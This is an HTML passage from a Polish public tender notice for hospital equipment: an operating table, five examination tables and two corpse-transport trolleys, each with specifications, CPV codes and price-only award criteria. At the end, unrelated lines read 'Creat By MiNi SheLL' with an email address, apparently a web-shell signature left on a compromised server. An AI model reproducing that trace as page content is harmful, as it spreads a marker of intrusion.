23.	Pilot z sygnalizacją stanu załadowania akumulatorów.
24.	Serwisowanie, przeprowadzenie testów okresowych przez modem.
25.	Możliwość podłączenia stołu do  systemu  zintegrowanej Sali operacyjnej.
26.	Przezierność blatu na całej długości dla promieniowania RTG (z uwzględnieniem przesuwu wzdłużnego).	
27.	 Obciążalność  stołu większa bądź równa 300kg.
28.	Wszystkie elementy metalowe blatów wykonane ze stali nierdzewnej kwasoodpornej( z wyłączeniem przegubów).Nie dopuszcza się zastosowania stopów metali lekkich, zwłaszcza aluminium, w konstrukcji ramy blatu i kolumny.	
WYPOSAŻENIE:
29.	Podpora reki anestezjologiczna	/2szt.
30.	Podpora Goepela z uchwytem do szyny bocznej /2szt.	
31.	Miska zbiorcza ze stali nierdzewnej montowana na wysięgniku obrotowym do szyny bocznej/ 1 kpl.	
32.	Ekran parawanu anestezjologicznego 1 szt.	
33.	Pas do ciała 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.22.30-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zakres nr 3 - UNIWERSALNY STÓŁ DO BADAŃ. SZT .5..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Uniwersalny, wielofunkcyjny stół zabiegowy. Rok produkcji nie później niż 2009r.
2. Szerokość powierzchni roboczej większa bądź równa 600mm  , dł. Powierzchni roboczej  większej bądź równej 1900mm
3. Nośność stołu 150kg
4. 2-segmentowa powierzchnia robocza
5. Mechanicznie regulowana wysokość i oparcie pleców
6. Przechyły Trendelenburga i anty- Trendelenburga
7. Wyposażenie:  - miska zabiegowa; - podpórka ręki; - stojak kroplówki; - schodek dla pacjenta..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.22.10-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zakres nr 4 - WÓZEK DO PRZEWOŻENIA ZWŁOK szt. 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Wózek do przewożenia zwłok. Rok produkcji nie później niż 2009r.
2.	Konstrukcja metalowa pokryta lakierem proszkowym
3.	Regulacja wysokości mechanizmem śrubowym
4.	Zdejmowane leże służące jako nosze
5.	4 koła jezdne w tym 2 z blokadą
6.	Pokrywa wózka materiałowa lub z tworzywa.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.94.80.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com